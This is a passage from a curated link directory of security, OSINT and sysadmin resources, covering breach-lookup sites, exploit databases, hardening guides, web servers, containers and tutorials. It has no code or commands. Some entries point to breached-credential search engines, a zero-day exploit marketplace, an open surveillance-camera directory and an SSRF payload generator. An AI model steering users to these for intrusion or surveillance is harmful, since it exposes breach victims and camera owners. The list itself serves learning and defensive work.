:small_orange_diamond: <a href="https://hunter.io/"><b>hunter</b></a> - lets you find email addresses in seconds and connect with the people that matter for your business.<br>
:small_orange_diamond: <a href="https://ghostproject.fr/"><b>GhostProject?</b></a> - search by full email address or username.<br>
:small_orange_diamond: <a href="https://www.databreaches.live/"><b>databreaches</b></a> - was my email affected by data breach?<br>
:small_orange_diamond: <a href="https://weleakinfo.com"><b>We Leak Info</b></a> - world's fastest and largest data breach search engine.<br>
:small_orange_diamond: <a href="https://pulsedive.com/"><b>Pulsedive</b></a> - scans of malicious URLs, IPs, and domains, including port scans and web requests.<br>
:small_orange_diamond: <a href="https://buckets.grayhatwarfare.com/"><b>Buckets by Grayhatwarfar</b></a> - database with public search for Open Amazon S3 Buckets and their contents.<br>
:small_orange_diamond: <a href="https://vigilante.pw/"><b>Vigilante.pw</b></a> - the breached database directory.<br>
:small_orange_diamond: <a href="https://builtwith.com/"><b>builtwith</b></a> - find out what websites are built with.<br>
:small_orange_diamond: <a href="https://nerdydata.com/"><b>NerdyData</b></a> - search the web's source code for technologies, across millions of sites.<br>
:small_orange_diamond: <a href="http://zorexeye.com/"><b>zorexeye</b></a> - search for sites, images, apps, softwares & more.<br>
:small_orange_diamond: <a href="https://www.mmnt.net/"><b>Mamont's open FTP Index</b></a> - if a target has an open FTP site with accessible content it will be listed here.<br>
:small_orange_diamond: <a href="https://osintframework.com/"><b>OSINT Framework</b></a> - focused on gathering information from free tools or resources.<br>
:small_orange_diamond: <a href="https://www.maltiverse.com/search"><b>maltiverse</b></a> - is a service oriented to cybersecurity analysts for the advanced analysis of indicators of compromise.<br>
:small_orange_diamond: <a href="https://leakedsource.ru/main/"><b>Leaked Source</b></a> - is a collaboration of data found online in the form of a lookup.<br>
:small_orange_diamond: <a href="https://search.weleakinfo.com/"><b>We Leak Info</b></a> - to help everyday individuals secure their online life, avoiding getting hacked.<br>
:small_orange_diamond: <a href="https://pipl.com/"><b>pipl</b></a> - is the place to find the person behind the email address, social username or phone number.<br>
:small_orange_diamond: <a href="https://abuse.ch/"><b>abuse.ch</b></a> - is operated by a random swiss guy fighting malware for non-profit.<br>
:small_orange_diamond: <a href="http://malc0de.com/database/"><b>malc0de</b></a> - malware search engine.<br>
:small_orange_diamond: <a href="https://cybercrime-tracker.net/index.php"><b>Cybercrime Tracker</b></a> - monitors and tracks various malware families that are used to perpetrate cyber crimes.<br>
:small_orange_diamond: <a href="https://github.com/eth0izzle/shhgit/"><b>shhgit</b></a> - find GitHub secrets in real time.<br>
:small_orange_diamond: <a href="https://searchcode.com/"><b>searchcode</b></a> - helping you find real world examples of functions, API's and libraries.<br>
:small_orange_diamond: <a href="http://www.insecam.org/"><b>Insecam</b></a> - the world biggest directory of online surveillance security cameras.<br>
:small_orange_diamond: <a href="http://index-of.es/"><b>index-of</b></a> - contains great stuff like: security, hacking, reverse engineering, cryptography, programming etc.<br>
:small_orange_diamond: <a href="https://opendata.rapid7.com/"><b>Rapid7 Labs Open Data</b></a> - is a great resources of datasets from Project Sonar.<br>
:small_orange_diamond: <a href="https://webtechsurvey.com/common-response-headers"><b>Common Response Headers</b></a> - the largest database of HTTP response headers.<br>
</p>
##### :black_small_square: Generators
<p>
:small_orange_diamond: <a href="https://thispersondoesnotexist.com/"><b>thispersondoesnotexist</b></a> - generate fake faces in one click - endless possibilities.<br>
:small_orange_diamond: <a href="https://generated.photos"><b>AI Generated Photos</b></a> - 100.000 AI generated faces.<br>
:small_orange_diamond: <a href="https://fakeface.co/"><b>fakeface</b></a> - fake faces browser.<br>
:small_orange_diamond: <a href="https://www.fakenamegenerator.com/"><b>fakenamegenerator</b></a> - your randomly generated identity.<br>
:small_orange_diamond: <a href="https://tools.intigriti.io/redirector/"><b>Intigriti Redirector</b></a> - open redirect/SSRF payload generator.<br>
</p>
##### :black_small_square: Passwords
<p>
:small_orange_diamond: <a href="https://haveibeenpwned.com/"><b>have i been pwned?</b></a> - check if you have an account that has been compromised in a data breach.<br>
:small_orange_diamond: <a href="https://www.dehashed.com/"><b>dehashed</b></a> - is a hacked database search engine.<br>
:small_orange_diamond: <a href="https://leakedsource.ru/"><b>Leaked Source</b></a> - is a collaboration of data found online in the form of a lookup.<br>
</p>
##### :black_small_square: CVE/Exploits databases
<p>
:small_orange_diamond: <a href="https://cve.mitre.org/"><b>CVE Mitre</b></a> - list of publicly known cybersecurity vulnerabilities.<br>
:small_orange_diamond: <a href="https://www.cvedetails.com/"><b>CVE Details</b></a> - CVE security vulnerability advanced database.<br>
:small_orange_diamond: <a href="https://www.exploit-db.com/"><b>Exploit DB</b></a> - CVE compliant archive of public exploits and corresponding vulnerable software.<br>
:small_orange_diamond: <a href="https://0day.today/"><b>0day.today</b></a> - exploits market provides you the possibility to buy/sell zero-day exploits.<br>
:small_orange_diamond: <a href="https://sploitus.com/"><b>sploitus</b></a> - the exploit and tools database.<br>
:small_orange_diamond: <a href="https://cxsecurity.com/exploit/"><b>cxsecurity</b></a> - free vulnerability database.<br>
:small_orange_diamond: <a href="https://www.vulncode-db.com/"><b>Vulncode-DB</b></a> - is a database for vulnerabilities and their corresponding source code if available.<br>
:small_orange_diamond: <a href="https://cveapi.com/"><b>cveapi</b></a> - free API for CVE data.<br>
</p>
##### :black_small_square: Mobile apps scanners
<p>
:small_orange_diamond: <a href="https://www.immuniweb.com/mobile/"><b>ImmuniWeb® Mobile App Scanner</b></a> - test security and privacy of mobile apps (iOS & Android).<br>
:small_orange_diamond: <a href="https://vulnerabilitytest.quixxi.com/"><b>Quixxi</b></a> - free Mobile App Vulnerability Scanner for Android & iOS.<br>
:small_orange_diamond: <a href="https://www.ostorlab.co/scan/mobile/"><b>Ostorlab</b></a> - analyzes mobile application to identify vulnerabilities and potential weaknesses.<br>
</p>
##### :black_small_square: Private Search Engines
<p>
:small_orange_diamond: <a href="https://www.startpage.com/"><b>Startpage</b></a> - the world's most private search engine.<br>
:small_orange_diamond: <a href="https://searx.me/"><b>searX</b></a> - a privacy-respecting, hackable metasearch engine.<br>
:small_orange_diamond: <a href="https://darksearch.io/"><b>darksearch</b></a> - the 1st real Dark Web search engine.<br>
:small_orange_diamond: <a href="https://www.qwant.com/"><b>Qwant</b></a> - the search engine that respects your privacy.<br>
:small_orange_diamond: <a href="https://duckduckgo.com/"><b>DuckDuckGo</b></a> - the search engine that doesn't track you.<br>
:small_orange_diamond: <a href="https://swisscows.com/"><b>Swisscows</b></a> - privacy safe web search<br>
:small_orange_diamond: <a href="https://search.disconnect.me/"><b>Disconnect</b></a> - the search engine that anonymizes your searches.<br>
:small_orange_diamond: <a href="https://metager.org/"><b>MetaGer</b></a> - the search engine that uses anonymous proxy and hidden Tor branches.<br>
</p>
##### :black_small_square: Secure Webmail Providers
<p>
:small_orange_diamond: <a href="https://countermail.com/"><b>CounterMail</b></a> - online email service, designed to provide maximum security and privacy.<br>
:small_orange_diamond: <a href="http://mail2tor.com/"><b>Mail2Tor</b></a> - is a Tor Hidden Service that allows anyone to send and receive emails anonymously.<br>
:small_orange_diamond: <a href="https://tutanota.com/"><b>Tutanota</b></a> - is the world's most secure email service and amazingly easy to use.<br>
:small_orange_diamond: <a href="https://protonmail.com/"><b>Protonmail</b></a> - is the world's largest secure email service, developed by CERN and MIT scientists.<br>
:small_orange_diamond: <a href="https://www.startmail.com/en/"><b>Startmail</b></a> - private & encrypted email made easy.<br>
</p>
##### :black_small_square: Crypto
<p>
:small_orange_diamond: <a href="https://keybase.io/"><b>Keybase</b></a> - it's open source and powered by public-key cryptography.<br>
</p>
##### :black_small_square: PGP Keyservers
<p>
:small_orange_diamond: <a href="https://keyserver.ubuntu.com/"><b>SKS OpenPGP Key server</b></a> - services for the SKS keyservers used by OpenPGP.<br>
</p>
#### Systems/Services [<sup>[TOC]</sup>](#anger-table-of-contents)
##### :black_small_square: Operating Systems
<p>
:small_orange_diamond: <a href="http://www.slackware.com/"><b>Slackware</b></a> - the most "Unix-like" Linux distribution.<br>
:small_orange_diamond: <a href="https://www.openbsd.org/"><b>OpenBSD</b></a> - multi-platform 4.4BSD-based UNIX-like operating system.<br>
:small_orange_diamond: <a href="https://hardenedbsd.org/"><b>HardenedBSD</b></a> - HardenedBSD aims to implement innovative exploit mitigation and security solutions.<br>
:small_orange_diamond: <a href="https://www.kali.org/"><b>Kali Linux</b></a> - Linux distribution used for Penetration Testing, Ethical Hacking and network security assessments.<br>
:small_orange_diamond: <a href="https://www.parrotsec.org/"><b>Parrot Security OS</b></a> - cyber security GNU/Linux environment.<br>
:small_orange_diamond: <a href="https://www.backbox.org/"><b>Backbox Linux</b></a> - penetration test and security assessment oriented Ubuntu-based Linux distribution.<br>
:small_orange_diamond: <a href="https://blackarch.org/"><b>BlackArch</b></a> - is an Arch Linux-based penetration testing distribution for penetration testers.<br>
:small_orange_diamond: <a href="https://www.pentoo.ch/"><b>Pentoo</b></a> - is a security-focused livecd based on Gentoo.<br>
:small_orange_diamond: <a href="https://securityonion.net/"><b>Security Onion</b></a> - Linux distro for intrusion detection, enterprise security monitoring, and log management.<br>
:small_orange_diamond: <a href="https://tails.boum.org/"><b>Tails</b></a> - is a live system that aims to preserve your privacy and anonymity.<br>
:small_orange_diamond: <a href="https://github.com/vedetta-com/vedetta"><b>vedetta</b></a> - OpenBSD router boilerplate.<br>
:small_orange_diamond: <a href="https://www.qubes-os.org"><b>Qubes OS</b></a> - is a security-oriented OS that uses Xen-based virtualization.<br>
</p>
##### :black_small_square: HTTP(s) Services
<p>
:small_orange_diamond: <a href="https://varnish-cache.org/"><b>Varnish Cache</b></a> - HTTP accelerator designed for content-heavy dynamic web sites.<br>
:small_orange_diamond: <a href="https://nginx.org/"><b>Nginx</b></a> - open source web and reverse proxy server that is similar to Apache, but very light weight.<br>
:small_orange_diamond: <a href="https://openresty.org/en/"><b>OpenResty</b></a> - is a dynamic web platform based on NGINX and LuaJIT.<br>
:small_orange_diamond: <a href="https://github.com/alibaba/tengine"><b>Tengine</b></a> - a distribution of Nginx with some advanced features.<br>
:small_orange_diamond: <a href="https://caddyserver.com/"><b>Caddy Server</b></a> - is an open source, HTTP/2-enabled web server with HTTPS by default.<br>
:small_orange_diamond: <a href="https://www.haproxy.org/"><b>HAProxy</b></a> - the reliable, high performance TCP/HTTP load balancer.<br>
</p>
##### :black_small_square: DNS Services
<p>
:small_orange_diamond: <a href="https://nlnetlabs.nl/projects/unbound/about/"><b>Unbound</b></a> - validating, recursive, and caching DNS resolver (with TLS).<br>
:small_orange_diamond: <a href="https://www.knot-resolver.cz/"><b>Knot Resolver</b></a> - caching full resolver implementation, including both a resolver library and a daemon.<br>
:small_orange_diamond: <a href="https://www.powerdns.com/"><b>PowerDNS</b></a> - is an open source authoritative DNS server, written in C++ and licensed under the GPL.<br>
</p>
##### :black_small_square: Other Services
<p>
:small_orange_diamond: <a href="https://github.com/z3APA3A/3proxy"><b>3proxy</b></a> - tiny free proxy server.<br>
</p>
##### :black_small_square: Security/hardening
<p>
:small_orange_diamond: <a href="https://twitter.com/EmeraldOnion"><b>Emerald Onion</b></a> - is a 501(c)(3) nonprofit organization and transit internet service provider (ISP).<br>
:small_orange_diamond: <a href="https://github.com/pi-hole/pi-hole"><b>pi-hole</b></a> - the Pi-hole® is a DNS sinkhole that protects your devices from unwanted content.<br>
:small_orange_diamond: <a href="https://github.com/stamparm/maltrail"><b>maltrail</b></a> - malicious traffic detection system.<br>
:small_orange_diamond: <a href="https://github.com/Netflix/security_monkey"><b>security_monkey</b></a> - monitors AWS, GCP, OpenStack, and GitHub orgs for assets and their changes over time.<br>
:small_orange_diamond: <a href="https://github.com/firecracker-microvm/firecracker"><b>firecracker</b></a> - secure and fast microVMs for serverless computing.<br>
:small_orange_diamond: <a href="https://github.com/StreisandEffect/streisand"><b>streisand</b></a> - sets up a new server running your choice of WireGuard, OpenSSH, OpenVPN, and more.<br>
</p>
#### Networks [<sup>[TOC]</sup>](#anger-table-of-contents)
##### :black_small_square: Tools
<p>
:small_orange_diamond: <a href="https://www.capanalysis.net/ca/"><b>CapAnalysis</b></a> - web visual tool to analyze large amounts of captured network traffic (PCAP analyzer).<br>
:small_orange_diamond: <a href="https://github.com/digitalocean/netbox"><b>netbox</b></a> - IP address management (IPAM) and data center infrastructure management (DCIM) tool.<br>
</p>
##### :black_small_square: Labs
<p>
:small_orange_diamond: <a href="https://labs.networkreliability.engineering/"><b>NRE Labs</b></a> - learn automation by doing it. Right now, right here, in your browser.<br>
</p>
##### :black_small_square: Other
<p>
:small_orange_diamond: <a href="https://ee.lbl.gov/"><b>LBNL's Network Research Group</b></a> - home page of the Network Research Group (NRG).<br>
</p>
#### Containers/Orchestration [<sup>[TOC]</sup>](#anger-table-of-contents)
##### :black_small_square: CLI Tools
<p>
:small_orange_diamond: <a href="https://github.com/google/gvisor"><b>gvisor</b></a> - container runtime sandbox.<br>
:small_orange_diamond: <a href="https://github.com/bcicen/ctop"><b>ctop</b></a> - top-like interface for container metrics.<br>
</p>
##### :black_small_square: Web Tools
<p>
:small_orange_diamond: <a href="https://github.com/moby/moby"><b>Moby</b></a> - a collaborative project for the container ecosystem to assemble container-based system.<br>
:small_orange_diamond: <a href="https://traefik.io/"><b>Traefik</b></a> - open source reverse proxy/load balancer provides easier integration with Docker and Let's encrypt.<br>
:small_orange_diamond: <a href="https://github.com/Kong/kong"><b>kong</b></a> - The Cloud-Native API Gateway.<br>
:small_orange_diamond: <a href="https://github.com/rancher/rancher"><b>rancher</b></a> - complete container management platform.<br>
:small_orange_diamond: <a href="https://github.com/portainer/portainer"><b>portainer</b></a> - making Docker management easy.<br>
:small_orange_diamond: <a href="https://github.com/jwilder/nginx-proxy"><b>nginx-proxy</b></a> - automated nginx proxy for Docker containers using docker-gen.<br>
</p>
##### :black_small_square: Security
<p>
:small_orange_diamond: <a href="https://github.com/docker/docker-bench-security"><b>docker-bench-security</b></a> - checks for dozens of common best-practices around deploying Docker.<br>
:small_orange_diamond: <a href="https://github.com/aquasecurity/trivy"><b>trivy</b></a> - vulnerability scanner for containers, suitable for CI.<br>
:small_orange_diamond: <a href="https://goharbor.io/"><b>Harbor</b></a> - cloud native registry project that stores, signs, and scans content.<br>
</p>
##### :black_small_square: Manuals/Tutorials/Best Practices
<p>
:small_orange_diamond: <a href="https://github.com/wsargent/docker-cheat-sheet"><b>docker-cheat-sheet</b></a> - a quick reference cheat sheet on Docker.<br>
:small_orange_diamond: <a href="https://github.com/veggiemonk/awesome-docker"><b>awesome-docker</b></a> - a curated list of Docker resources and projects.<br>
:small_orange_diamond: <a href="https://github.com/yeasy/docker_practice"><b>docker_practice</b></a> - learn and understand Docker technologies, with real DevOps practice!<br>
:small_orange_diamond: <a href="https://github.com/docker/labs"><b>labs
</b></a> - is a collection of tutorials for learning how to use Docker with various tools.<br>
:small_orange_diamond: <a href="https://github.com/jessfraz/dockerfiles"><b>dockerfiles</b></a> - various Dockerfiles I use on the desktop and on servers.<br>
:small_orange_diamond: <a href="https://github.com/kelseyhightower/kubernetes-the-hard-way"><b>kubernetes-the-hard-way</b></a> - bootstrap Kubernetes the hard way on Google Cloud Platform. No scripts.<br>
:small_orange_diamond: <a href="https://github.com/jamesward/kubernetes-the-easy-way"><b>kubernetes-the-easy-way</b></a> - bootstrap Kubernetes the easy way on Google Cloud Platform. No scripts.<br>
:small_orange_diamond: <a href="https://github.com/dennyzhang/cheatsheet-kubernetes-A4"><b>cheatsheet-kubernetes-A4</b></a> - Kubernetes CheatSheets in A4.<br>
:small_orange_diamond: <a href="https://github.com/kabachook/k8s-security"><b>k8s-security</b></a> - kubernetes security notes and best practices.<br>
:small_orange_diamond: <a href="https://learnk8s.io/production-best-practices/"><b>kubernetes-production-best-practices</b></a> - checklists with best-practices for production-ready Kubernetes.<br>
:small_orange_diamond: <a href="https://github.com/freach/kubernetes-security-best-practice"><b>kubernetes-production-best-practices</b></a> - kubernetes security - best practice guide.<br>
:small_orange_diamond: <a href="https://github.com/hjacobs/kubernetes-failure-stories"><b>kubernetes-failure-stories</b></a> - is a compilation of public failure/horror stories related to Kubernetes.<br>
</p>
#### Manuals/Howtos/Tutorials [<sup>[TOC]</sup>](#anger-table-of-contents)
##### :black_small_square: Shell/Command line
<p>
:small_orange_diamond: <a href="https://github.com/dylanaraps/pure-bash-bible"><b>pure-bash-bible</b></a> - is a collection of pure bash alternatives to external processes.<br>
:small_orange_diamond: <a href="https://github.com/dylanaraps/pure-sh-bible"><b>pure-sh-bible</b></a> - is a collection of pure POSIX sh alternatives to external processes.<br>
:small_orange_diamond: <a href="https://github.com/Idnan/bash-guide"><b>bash-guide</b></a> - is a guide to learn bash.<br>
:small_orange_diamond: <a href="https://github.com/denysdovhan/bash-handbook"><b>bash-handbook</b></a> - for those who wanna learn Bash.<br>
:small_orange_diamond: <a href="https://wiki.bash-hackers.org/start"><b>The Bash Hackers Wiki</b></a> - hold documentation of any kind about GNU Bash.<br>
:small_orange_diamond: <a href="http://pubs.opengroup.org/onlinepubs/9699919799/utilities/contents.html"><b>Shell & Utilities</b></a> - describes the commands offered to application programs by POSIX-conformant systems.<br>
:small_orange_diamond: <a href="https://github.com/jlevy/the-art-of-command-line"><b>the-art-of-command-line</b></a> - master the command line, in one page.<br>
:small_orange_diamond: <a href="https://google.github.io/styleguide/shellguide.html"><b>Shell Style Guide</b></a> - a shell style guide for Google-originated open-source projects.<br>
</p>
##### :black_small_square: Text Editors
<p>
:small_orange_diamond: <a href="https://vim.rtorr.com/"><b>Vim Cheat Sheet</b></a> - great multi language vim guide.<br>
</p>
##### :black_small_square: Python
<p>
:small_orange_diamond: <a href="https://awesome-python.com/"><b>Awesome Python</b></a> - a curated list of awesome Python frameworks, libraries, software and resources.<br>
:small_orange_diamond: <a href="https://github.com/gto76/python-cheatsheet"><b>python-cheatsheet</b></a> - comprehensive Python cheatsheet.<br>
:small_orange_diamond: <a href="https://www.pythoncheatsheet.org/"><b>pythoncheatsheet.org</b></a> - basic reference for beginner and advanced developers.<br>
</p>
##### :black_small_square: Sed & Awk & Other
<p>
:small_orange_diamond: <a href="https://posts.specterops.io/fawk-yeah-advanced-sed-and-awk-usage-parsing-for-pentesters-3-e5727e11a8ad?gi=c8f9506b26b6"><b>F’Awk Yeah!</b></a> - advanced sed and awk usage (Parsing for Pentesters 3).<br>
</p>
##### :black_small_square: \*nix & Network
<p>
:small_orange_diamond: <a href="https://www.cyberciti.biz/"><b>nixCraft</b></a> - linux and unix tutorials for new and seasoned sysadmin.<br>
:small_orange_diamond: <a href="https://www.tecmint.com/"><b>TecMint</b></a> - the ideal Linux blog for Sysadmins & Geeks.<br>
:small_orange_diamond: <a href="http://www.omnisecu.com/index.php"><b>Omnisecu</b></a> - free Networking, System Administration and Security tutorials.<br>
:small_orange_diamond: <a href="https://github.com/cirosantilli/linux-cheat"><b>linux-cheat</b></a> - Linux tutorials and cheatsheets. Minimal examples. Mostly user-land CLI utilities.<br>
:small_orange_diamond: <a href="https://github.com/snori74/linuxupskillchallenge"><b>linuxupskillchallenge</b></a> - learn the skills required to sysadmin.<br>
:small_orange_diamond: <a href="http://cb.vu/unixtoolbox.xhtml"><b>Unix Toolbox</b></a> - Unix/Linux/BSD commands and tasks which are useful for IT work or for advanced users.<br>
:small_orange_diamond: <a href="https://linux-kernel-labs.github.io/refs/heads/master/index.html"><b>Linux Kernel Teaching</b></a> - is a collection of lectures and labs Linux kernel topics.<br>
:small_orange_diamond: <a href="https://peteris.rocks/blog/htop/"><b>htop explained</b></a> - explanation of everything you can see in htop/top on Linux.<br>
:small_orange_diamond: <a href="https://linuxguideandhints.com/"><b>Linux Guide and Hints</b></a> - tutorials on system administration in Fedora and CentOS.<br>
:small_orange_diamond: <a href="https://github.com/NanXiao/strace-little-book"><b>strace-little-book</b></a> - a little book which introduces strace.<br>
:small_orange_diamond: <a href="https://github.com/goldshtn/linux-tracing-workshop"><b>linux-tracing-workshop</b></a> - examples and hands-on labs for Linux tracing tools workshops.<br>
:small_orange_diamond: <a href="https://github.com/bagder/http2-explained"><b>http2-explained</b></a> - a detailed document explaining and documenting HTTP/2.<br>
:small_orange_diamond: <a href="https://github.com/bagder/http3-explained"><b>http3-explained</b></a> - a document describing the HTTP/3 and QUIC protocols.<br>
:small_orange_diamond: <a href="https://www.manning.com/books/http2-in-action"><b>HTTP/2 in Action</b></a> - an excellent introduction to the new HTTP/2 standard.<br>
:small_orange_diamond: <a href="https://www.saminiir.com/lets-code-tcp-ip-stack-1-ethernet-arp/"><b>Let's code a TCP/IP stack</b></a> - great stuff to learn network and system programming at a deeper level.<br>
:small_orange_diamond: <a href="https://github.com/trimstray/nginx-admins-handbook"><b>Nginx Admin's Handbook</b></a> - how to improve NGINX performance, security and other important things.<br>
:small_orange_diamond: <a href="https://github.com/digitalocean/nginxconfig.io"><b>nginxconfig.io</b></a> - NGINX config generator on steroids.<br>
:small_orange_diamond: <a href="https://infosec.mozilla.org/guidelines/openssh"><b>openssh guideline</b></a> - is to help operational teams with the configuration of OpenSSH server and client.<br>
:small_orange_diamond: <a href="https://gravitational.com/blog/ssh-handshake-explained/"><b>SSH Handshake Explained</b></a> - is a relatively brief description of the SSH handshake.<br>
:small_orange_diamond: <a href="https://kb.isc.org/docs/using-this-knowledgebase"><b>ISC's Knowledgebase</b></a> - you'll find some general information about BIND 9, ISC DHCP, and Kea DHCP.<br>
:small_orange_diamond: <a href="https://packetlife.net/"><b>PacketLife.net</b></a> - a place to record notes while studying for Cisco's CCNP certification.<br>
</p>
##### :black_small_square: Microsoft
<p>
:small_orange_diamond: <a href="https://github.com/infosecn1nja/AD-Attack-Defense"><b>AD-Attack-Defense</b></a> - attack and defend active directory using modern post exploitation activity.<br>
</p>
##### :black_small_square: Large-scale systems
<p>
:small_orange_diamond: <a href="https://github.com/donnemartin/system-design-primer"><b>The System Design Primer</b></a> - learn how to design large-scale systems.<br>
:small_orange_diamond: <a href="https://github.com/binhnguyennus/awesome-scalability"><b>Awesome Scalability</b></a> - best practices in building High Scalability, High Availability, High Stability, and more.<br>
:small_orange_diamond: <a href="https://engineering.videoblocks.com/web-architecture-101-a3224e126947?gi=a896808d22a"><b>Web Architecture 101</b></a> - the basic architecture concepts.<br>
</p>
##### :black_small_square: System hardening
<p>
:small_orange_diamond: <a href="https://www.cisecurity.org/cis-benchmarks/"><b>CIS Benchmarks</b></a> - secure configuration settings for over 100 technologies, available as a free PDF.<br>
:small_orange_diamond: <a href="https://highon.coffee/blog/security-harden-centos-7/"><b>Security Harden CentOS 7</b></a> - this walks you through the steps required to security harden CentOS.<br>
:small_orange_diamond: <a href="https://www.lisenet.com/2017/centos-7-server-hardening-guide/"><b>CentOS 7 Server Hardening Guide</b></a> - great guide for hardening CentOS; familiar with OpenSCAP.<br>
:small_orange_diamond: <a href="https://github.com/decalage2/awesome-security-hardening"><b>awesome-security-hardening</b></a> - is a collection of security hardening guides, tools and other resources.<br>
:small_orange_diamond: <a href="https://github.com/trimstray/the-practical-linux-hardening-guide"><b>The Practical Linux Hardening Guide</b></a> - provides a high-level overview of hardening GNU/Linux systems.<br>
:small_orange_diamond: <a href="https://madaidans-insecurities.github.io/guides/linux-hardening.html"><b>Linux Hardening Guide</b></a> - how to harden Linux as much as possible for security and privacy.<br>
</p>
##### :black_small_square: Security & Privacy
<p>
:small_orange_diamond: <a href="https://www.hackingarticles.in/"><b>Hacking Articles</b></a> - LRaj Chandel's Security & Hacking Blog.<br>
:small_orange_diamond: <a href="https://github.com/toniblyx/my-arsenal-of-aws-security-tools"><b>AWS security tools</b></a> - make your AWS cloud environment more secure.<br>
:small_orange_diamond: <a href="https://inventory.rawsec.ml/index.html"><b>Rawsec's CyberSecurity Inventory</b></a> - an inventory of tools and resources about CyberSecurity.<br>
:small_orange_diamond: <a href="https://tls.ulfheim.net/"><b>The Illustrated TLS Connection</b></a> - every byte of a TLS connection explained and reproduced.<br>
:small_orange_diamond: <a href="https://github.com/ssllabs/research/wiki/SSL-and-TLS-Deployment-Best-Practices"><b>SSL Research</b></a> - SSL and TLS Deployment Best Practices by SSL Labs.<br>
:small_orange_diamond: <a href="http://selinuxgame.org/index.html"><b>SELinux Game</b></a> - learn SELinux by doing. Solve Puzzles, show skillz.<br>
:small_orange_diamond: <a href="https://smallstep.com/blog/everything-pki.html"><b>Certificates and PKI</b></a> - everything you should know about certificates and PKI but are too afraid to ask.<br>
:small_orange_diamond: <a href="https://appsecco.com/books/subdomain-enumeration/"><b>The Art of Subdomain Enumeration</b></a> - a reference for subdomain enumeration techniques.<br>
:small_orange_diamond: <a href="https://lifehacker.com/the-comprehensive-guide-to-quitting-google-1830001964"><b>Quitting Google</b></a> - the comprehensive guide to quitting Google.<br>
</p>
##### :black_small_square: Web Apps
<p>
:small_orange_diamond: <a href="https://www.owasp.org/index.php/Main_Page"><b>OWASP</b></a> - worldwide not-for-profit charitable organization focused on improving the security of software.<br>
:small_orange_diamond: <a href="https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project"><b>OWASP ASVS 3.0.1</b></a> - OWASP Application Security Verification Standard Project.<br>
:small_orange_diamond: <a href="https://github.com/Santandersecurityresearch/asvs"><b>OWASP ASVS 3.0.1 Web App</b></a> - simple web app that helps developers understand the ASVS requirements.<br>
:small_orange_diamond: <a href="https://github.com/OWASP/ASVS/tree/master/4.0"><b>OWASP ASVS 4.0</b></a> - is a list of application security requirements or tests.<br>
:small_orange_diamond: <a href="https://www.owasp.org/index.php/OWASP_Testing_Project"><b>OWASP Testing Guide v4</b></a> - includes a "best practice" penetration testing framework.<br>
:small_orange_diamond: <a href="https://github.com/OWASP/DevGuide"><b>OWASP Dev Guide</b></a> - this is the development version of the OWASP Developer Guide.<br>
:small_orange_diamond: <a href="https://github.com/OWASP/wstg"><b>OWASP WSTG</b></a> - is a comprehensive open source guide to testing the security of web apps.<br>
:small_orange_diamond: <a href="https://www.owasp.org/index.php/OWASP_API_Security_Project"><b>OWASP API Security Project</b></a> - focuses specifically on the top ten vulnerabilities in API security.<br>
:small_orange_diamond: <a href="https://infosec.mozilla.org/guidelines/web_security.html"><b>Mozilla Web Security</b></a> - help operational teams with creating secure web applications.<br>
:small_orange_diamond: <a href="https://github.com/Netflix/security-bulletins"><b>security-bulletins</b></a> - security bulletins that relate to Netflix Open Source.<br>
:small_orange_diamond: <a href="https://github.com/shieldfy/API-Security-Checklist"><b>API-Security-Checklist</b></a> - security countermeasures when designing, testing, and releasing your API.<br>
:small_orange_diamond: <a href="https://enable-cors.org/index.html"><b>Enable CORS</b></a> - enable cross-origin resource sharing.<br>
:small_orange_diamond: <a href="https://appsecwiki.com/#/"><b>Application Security Wiki</b></a> - is an initiative to provide all application security related resources at one place.<br>
:small_orange_diamond: <a href="https://github.com/GrrrDog/weird_proxies/wiki"><b>Weird Proxies</b></a> - reverse proxy related attacks; it is a result of analysis of various proxies.<br>
:small_orange_diamond: <a href="https://dfir.it/blog/2015/08/12/webshell-every-time-the-same-purpose/"><b>Webshells</b></a> - great series about malicious payloads.<br>
:small_orange_diamond: <a href="https://portswigger.net/blog/practical-web-cache-poisoning"><b>Practical Web Cache Poisoning</b></a> - show you how to compromise websites by using esoteric web features.<br>
:small_orange_diamond: <a href="https://github.com/bl4de/research/tree/master/hidden_directories_leaks"><b>Hidden directories and files</b></a> - as a source of sensitive information about web application.<br>
:small_orange_diamond: <a href="https://bo0om.ru/en/"><b>Explosive blog</b></a> - great blog about cybersec and pentests.<br>
:small_orange_diamond: <a href="https://www.netsparker.com/security-cookies-whitepaper/"><b>Security Cookies</b></a> - this paper will take a close look at cookie security.<br>
:small_orange_diamond: <a href="https://github.com/GitGuardian/APISecurityBestPractices"><b>APISecurityBestPractices</b></a> - help you keep secrets (API keys, db credentials, certificates) out of source code.<br>
</p>
##### :black_small_square: All-in-one
<p>
:small_orange_diamond: <a href="https://lzone.de/cheat-sheet/"><b>LZone Cheat Sheets</b></a> - all cheat sheets.<br>
:small_orange_diamond: <a href="https://github.com/rstacruz/cheatsheets"><b>Dan’s Cheat Sheets’s</b></a> - massive cheat sheets documentation.<br>
:small_orange_diamond: <a href="https://devhints.io/"><b>Rico's cheatsheets</b></a> - this is a modest collection of cheatsheets.<br>
:small_orange_diamond: <a href="https://devdocs.io/"><b>DevDocs API</b></a> - combines multiple API documentations in a fast, organized, and searchable interface.<br>
:small_orange_diamond: <a href="https://cheat.sh/"><b>cheat.sh</b></a> - the only cheat sheet you need.<br>
:small_orange_diamond: <a href="https://gnulinux.guru/"><b>gnulinux.guru</b></a> - collection of cheat sheets about bash, vim and networking.<br>
</p>
##### :black_small_square: Ebooks
<p>
:small_orange_diamond: <a href="https://github.com/EbookFoundation/free-programming-books"><b>free-programming-books</b></a> - list of free learning resources in many languages.<br>
</p>
##### :black_small_square: Other
<p>
:small_orange_diamond: <a href="https://bitvijays.github.io/LFC-VulnerableMachines.html"><b>CTF Series : Vulnerable Machines</b></a> - the steps below could be followed to find vulnerabilities and exploits.<br>
:small_orange_diamond: <a href="https://github.com/manoelt/50M_CTF_Writeup"><b>50M_CTF_Writeup</b></a> - $50 million CTF from Hackerone - writeup.<br>
:small_orange_diamond: <a href="https://github.com/j00ru/ctf-tasks"><b>ctf-tasks</b></a> - an archive of low-level CTF challenges developed over the years.<br>
:small_orange_diamond: <a href="https://hshrzd.wordpress.com/how-to-start/"><b>How to start RE/malware analysis?</b></a> - collection of some hints and useful links for the beginners.<br>
:small_orange_diamond: <a href="http://www.kegel.com/c10k.html"><b>The C10K problem</b></a> - it's time for web servers to handle ten thousand clients simultaneously, don't you think?<br>
